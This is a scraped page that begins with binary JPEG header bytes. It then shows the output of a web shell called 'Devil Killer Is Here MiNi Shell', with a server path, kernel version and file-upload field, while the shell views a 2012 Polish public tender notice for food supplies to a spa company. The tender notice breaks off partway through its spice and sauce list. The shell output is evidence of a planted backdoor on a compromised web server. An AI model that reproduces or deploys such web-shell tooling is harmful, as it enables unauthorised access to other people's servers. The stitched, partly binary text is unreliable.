JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120419/89459-N-2012.html

<p class="kh_header"><b>Szczawno Zdrój: Przedmiotem zamówienia są dostawy artykułów spożywczych różnych do Punktów Żywienia Uzdrowiska Szczawno-Jedlina S.A. w Szczawnie Zdroju.</b><br>
<b>Numer ogłoszenia: 89459 - 2012; data zamieszczenia: 19.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Szczawno-Jedlina S.A. , ul. Ratuszowa 1, 58-310 Szczawno Zdrój, woj. dolnośląskie, tel. 074 8493201, faks 074 8436764.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczawno-jedlina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są dostawy artykułów spożywczych różnych do Punktów Żywienia Uzdrowiska Szczawno-Jedlina S.A. w Szczawnie Zdroju..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEDMIOT ZAMÓWIENIA ZOSTAŁ PODZIELONY NA 6 ZADAŃ: 

Zadanie nr  1:   Dostawy przypraw, sosów i zup;
Zadanie nr  2:   Dostawy mąki, kaszy, ryżu, makaronów i produktów zbożowych;
Zadanie nr  3:   Dostawy kawy, herbaty i produktów podobnych;
Zadanie nr  4:   Dostawy soli, cukru i wyrobów cukierniczych, kakao, bakalii oraz koncentratów deserów; 
Zadanie nr  5:   Dostawy przetworów;
Zadanie nr  6:   Dostawy ryb mrożonych.

Szczegółowe informacje zawarte zostały w SIWZ i załącznikach do SIWZ dostępnych na stronie internetowej Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.87.10.00-4, 15.89.10.00-0, 15.61.20.00-1, 03.21.13.00-6, 15.85.11.00-9, 15.61.33.00-1, 15.86.00.00-4, 15.87.24.00-5, 15.83.00.00-5, 15.87.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć odpowiednie      dokumenty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem:
      - oświadczenie o posiadaniu uprawnień niezbędnych do wykonywania działalności w zakresie
odpowiadającym przedmiotowi zamówienia, wg załącznika  nr 3. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie musi być przedmiotowe oświadczenie złożone (podpisane) przez Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub oświadczenia złożone (podpisane) przez każdego z Wykonawców składających ofertę wspólną). 
Sprawdzenie spełnienia ww warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych   przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonują lub wykonali w ciągu ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest  krótszy - w tym okresie, co najmniej 2 dostawy odpowiadające swym rodzajem dostawom stanowiącym przedmiot niniejszego zamówienia, tj. dostawom artykułów spożywczych, o wartości  nie mniejszej niż: 70 tyś. zł dla zadań 1-2, 50  tyś. zł  dla zadań 3-6.
 W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące
 oświadczenia i dokumenty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem:     

a.	wykaz dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie 3 ostatnich lat przed dniem wszczęcia postępowania (a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie). Wykaz winien zawierać  co najmniej 2 dostawy odpowiadające swym rodzajem dostawom stanowiącym przedmiot niniejszego zamówienia, tj. dostawom artykułów spożywczych, o wartości  nie mniejszej niż: 70 tyś. zł dla zadań 1-2, 50  tyś. zł  dla zadań 3-6, z podaniem przedmiotu zamówienia, daty wykonania zadania, nazwy (firmy) odbiorcy i wartości wraz z załączeniem dokumentu potwierdzającego należyte wykonanie dostawy (np. referencje). Wzór wykazu - Załącznik nr 4 do SIWZ.
Sprawdzenie spełnienia ww warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych   przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące
 oświadczenia i dokumenty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem:    
 
a.	aktualna decyzja lub zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej dopuszczająca środek transportu do przewozu artykułów spożywczych będących przedmiotem zamówienia;

b.	aktualna decyzja lub zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej dopuszczająca środek transportu (chłodni) do przewozu artykułów spożywczych będących przedmiotem zamówienia (dotyczy Zadania nr 6);

c.	oświadczenie o gotowości do dostarczenia Zamawiającemu (w razie potrzeby na wniosek Zamawiającego) 4 sztuk zamrażarek skrzyniowych o pojemności min. 250 l każda i przekazania ich w nieodpłatne użytkowanie Zamawiającemu przez cały okres realizacji przedmiotu zamówienia (dotyczy Zadania nr 6) - Załącznik nr 5 do SIWZ.
d.	zaświadczenie lub inny dokument właściwego organu Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej o objęciu nadzorem funkcjonowania systemu HACCP u Wykonawcy, bądź kopię certyfikatu potwierdzającego stosowanie systemu HACCP wydany przez jednostki posiadające stosowne akredytacje. Przedłożony dokument powinien potwierdzać, że Wykonawca wdrożył oraz stosuje zasady systemu HACCP; 
Sprawdzenie spełnienia ww warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych   przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące
 oświadczenia i dokumenty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem:    
 
a.	opłacona polisa ubezpieczeniowa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż 100  tys. zł.;

Opłacenie polisy winno wynikać z samej jej treści lub wykonawca winien załączyć dokumenty potwierdzające jej   opłacenie tj. polecenie dokonania przelewu, dowód KP lub inne.
Sprawdzenie spełnienia ww warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych   przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-	pełnomocnictwo w przypadku składania oferty wspólnej,
-	pełnomocnictwo do działania w imieniu Wykonawcy zgodnie z przepisami k.c. w przypadku, gdy ofertę składa osoba nieupoważniona do reprezentowania Wykonawcy z mocy prawa,
-	zaparafowany projekt umowy,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmianę umowy w następujących przypadkach:
-  jeżeli zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna);
-  jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczawno-jedlina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Szczawno-Jedlina S.A.
ul. Ratuszowa 1,58-310 Szczawno Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2012 godzina 11:00, miejsce: Uzdrowisko Szczawno-Jedlina S.A., ul. Ratuszowa 1, 58-310 Szczawno Zdrój, Kancelaria (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy przypraw, sosów i zup;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	NAZWA I OPIS PRODUKTU	WIELKOŚĆ OPAKOWANIA	ILOŚĆ
1	Aroma mix maślano-ziołowy mieszanka przypraw takich, jak natka pietruszki, majeranek, cząber, gałka muszkatołowa, pieprz biały i lubczyk z delikatnym sosem, zawartość sodu nie więcej niż 8,8 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny.	1,1 kg	8
2	Auszpik - żelatyna spożywcza wieprzowa 100% do przygotowywania słodkich deserów lub słonych przekąsek, przystawek, zawartość sodu nie więcej niż 0,495 g, typu Knorr, Winiary, Prymat lub równoważny.	 0,8 kg	8
3	Barszcz biały, zawartość sodu nie więcej niż 0,32 g na 100 g produktu, wydajność 51 l, typu Knorr, Winiary, Prymat lub równoważny	3 kg	15
4	Barszcz czerwony, zawartość sodu nie więcej niż 0,5 g na 100 g produktu, wydajność 17 l, typu Knorr, Winiary, Prymat lub równoważny	1,3 kg	50
5	Bazylia	10 g	20
6	Bulion jarzynowy (drobiowy) z cząstkami warzyw, wydajność opakowania 1 kg nie mniejsza niż 45 litrów (200 porcji po 250 ml) typu Winiary, Prymat, Knorr lub równoważny 	2,2kg	75
7	Bulion jarzynowy z cząstkami warzyw, wydajność opakowania 1 kg nie mniejsza niż 45 litrów (200 porcji po 250 ml) typu Winiary, Prymat, Knorr lub równoważny 	2,2kg	2
8	Czosnek mielony	20 g	1800
9	Delikat - mieszanka przypraw do mięs w składzie m. in. papryka, cebula, czosnek, pietruszka, typu Knorr, Winiary, Prymat lub równoważny 	0,7 kg	10
10	Delikat - mieszanka przypraw do drobiu w składzie m. in. papryka, curry, czosnek, pietruszka, typu Knorr, Winiary, Prymat lub równoważny	0,6 kg	80
11	Delikat - mieszanka przypraw do ryb w składzie m.in. natka pietruszki, koperek, tymianek, czosnek, imbir typu Knorr, Winiary, Prymat lub równoważny 	0,6 kg	15
12	Fix do gulaszu, zawartość sodu nie więcej niż 0,40 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	1,1 kg	3
13	Fix do potraw chińskich, zawartość sodu nie więcej niż 0,61 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	0,7 kg	13
14	Goździki	15 g	20
15	Kminek	20 g	180
16	Koper suszony	1 kg	3
17	Liść laurowy	10 g	150
18	Majeranek	10 g	800
19	Mieszanka przyprawowo-warzywna typu Vegetta, Ziarenka Smaku, Kucharek lub równoważna	200 g	800
20	Papryka mielona	1 kg	2
21	Papryka mielona	15 g	1000
22	Pieprz mielony	20 g	2000
23	Pieprz ziołowy	20 g	800
24	Pietruszka suszona	1 kg	3
25	Przyprawa grzybowa o konsystencji pasty - kompozycja przypraw, tłuszczu i soli na bazie pieczarek z aromatem leśnych grzybów , duża wydajność nie mniejsza niż 1 łyżeczka na 1 l, zawartość sodu nie więcej niż 4,84 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	340 g	2
26	Przyprawa do gyrosa	30 g	100
27	Przyprawa w płynie, typu Maggi lub równoważna	1l	900
28	Sos 4 sery z brokułami na bazie serów typu mozarella, niebieskich pleśniowych oraz innych serów dojrzewających, zawartość sodu nie więcej niż 0,42 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny 	0,9 kg	5
29	Sos biały - baza do przygotowywania jasnych sosów, zawartość sodu nie więcej niż 0,38 g na 100 g produktu, typu Knorr lub równoważny 	3 kg	2
30	Sos cygański z kawałkami papryki do mięs, drobiu, pyz, typu Knorr, Winiary, Prymat lub równoważny 	1,1 kg	4
31	Sos cytrynowo-maślany, zawartość sodu nie więcej niż 0,54 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	0,7 kg	6
32	Sos do spaghetti Carbonara z boczkiem, zawartość sodu nie więcej niż 0,40 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny 	0,9 kg	3
33	Sos do spaghetti Napoli,Bolognese, zawartość sodu nie więcej niż 0,83 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	900g	20
34	Sos grzybowy, typu Knorr, Winiary, Prymat lub równoważny	1,1 kg	10
35	Sos myśliwski, zawartość sodu nie więcej niż 0,38 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	1,1 kg	3
36	Sos sałatkowy ogrodowy - sos o smaku cytrynowo-ziołowym, do stosowania również jako marynata, typu Knorr, Winiary, Prymat lub równoważny 	0,7 kg	6
37	Sos pieczarkowo-borowikowy, typu Knorr, Winiary, Prymat lub równoważny	1 kg	8
38	Sos pieczeniowy, typu Knorr, Winiary, Prymat lub równoważny	1 kg	8
39	Sos pieprzowy, zawartość sodu nie więcej niż 0,55 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	1 l	2
40	Sos sałatkowy czosnkowy, zawartość sodu nie więcej niż 0,425 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	0,7 kg	5
41	Sos sałatkowy grecki kompozycja  ziół, przypraw i warzyw: oregano, rozmarynu, kolendry, natki pietruszki, pieprzu cayenne, kurkumy, szalotki, zawartość sodu nie więcej niż 0,66 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	0,7 kg	6
42	Sos sałatkowy koperkowy, typu Knorr, Winiary, Prymat lub równoważny	0,8 kg	4
43	Sos sałatkowy Tysiąc Wysp, zawartość sodu nie więcej niż 0,40 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	0,7 kg	5
44	Sos węgierski, zawartość sodu nie więcej niż 0,37 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	1,2 kg	4
45	Sos z zielonym pieprzem - sos pieczeniowy z cząsteczkami zielonego pieprzu do mięs, rolad oraz mięs z grilla.	1,2 kg	6
46	Ziele angielskie	15 g	360
47	Zioła prowansalskie	10 g	30
48	Zupa brokułowa, zawartość sodu nie więcej niż 0,32 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	1,3 kg	5
49	Zupa cebulowa, zawartość sodu nie więcej niż 0,45 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	0,63 kg	10
50	Zupa jarzynowa	1 kg	3
51	Zupa kalafiorowa, zawartość sodu nie więcej niż 0,33 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	3 kg	4
